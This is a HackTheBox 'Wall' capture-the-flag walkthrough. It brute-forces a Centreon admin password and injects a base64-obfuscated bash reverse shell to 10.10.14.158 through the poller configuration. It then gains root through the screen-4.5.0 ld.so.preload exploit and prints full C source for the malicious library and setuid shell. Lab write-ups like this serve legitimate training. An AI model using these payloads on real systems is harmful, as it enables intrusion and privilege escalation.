WALL – (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.157

Now try to access http://10.10.10.157

root@kali:~/Downloads# gobuster dir -u http://10.10.10.157 -w /usr/share/wordlists/dirb/common.txt

Now on browser

http://10.10.10.157/monitoring

Now on terminal

root@kali:~/Downloads# curl -X POST http://10.10.10.157/monitoring/

Now on browser try to access

http://10.10.10.157/centreon/

root@kali:~/Downloads# wfuzz -c -X POST -d “username=admin&password=FUZZ” -w ./darkweb2017-top10000.txt http://10.10.10.157/centreon/api/index.php?action=authenticate

Back to portal

Username : admin

Password : password1

And we are in

I checked the version of centreon and it was 19.04:

root@kali:~/Downloads# nc -lvnp 1337

on the portal

Configuration > poller

root@kali:~/Downloads# echo ‘bash -i >& /dev/tcp/10.10.14.158/1337 0>&1’ | base64

root@kali:~/Downloads# echo “echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNTgvMTMzNyAwPiYxCg== | base64 -d |bash” |sed ‘s/ /${IFS}/g’

root@kali:~/Downloads# echo “echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNTgvMTMzNyAwPiYxCg== | base64 -d |bash”

Copy this

echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNTgvMTMzNyAwPiYxCg==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash

now on portal

Save it

Now select the central and click on export configuration

Now click on export

And at the listener we get the shell

www-data@Wall:/usr/local/centreon/www$ cd /home

www-data@Wall:/home$ ls –la

www-data@Wall:/home$ cd Shelby

www-data@Wall:/home/shelby$ cat user.txt

I searched for suid binaries and saw screen-4.5.0, similar to the privesc in Flujab

https://www.exploit-db.com/exploits/41154

on another terminal

root@kali:~/Downloads# nano libhax.c

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

__attribute__ ((__constructor__))

void dropshell(void){

    chown(“/tmp/rootshell”, 0, 0);

    chmod(“/tmp/rootshell”, 04755);

    unlink(“/etc/ld.so.preload”);

    printf(“[+] done!\n”);

}

Save it

root@kali:~/Downloads# nano rootshell.c

#include <stdio.h>

int main(void){

    setuid(0);

    setgid(0);

    seteuid(0);

    setegid(0);

    execvp(“/bin/sh”, NULL, NULL);

}

root@kali:~/Downloads# gcc -fPIC -shared -ldl -o libhax.so libhax.c

root@kali:~/Downloads# gcc -o rootshell rootshell.c

root@kali:~/Downloads# python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 …

Now on shell

www-data@Wall:/tmp$ wget http://10.10.14.158:8080/libhax.so

www-data@Wall:/tmp$ wget http://10.10.14.158:8080/rootshell

www-data@Wall:/tmp$ cd /etc

www-data@Wall:/etc$ umask 000

www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne  “\x0a/tmp/libhax.so”

www-data@Wall:/etc$ /bin/screen-4.5.0 –ls

www-data@Wall:/etc$ /tmp/rootshell

whoami

id

cd /home/shelby

cat user.txt

fe6194544f452f62XXXXXXXXXXXXXXXXX

cd /root

cat root.txt

1fdbcf8c33eaaXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT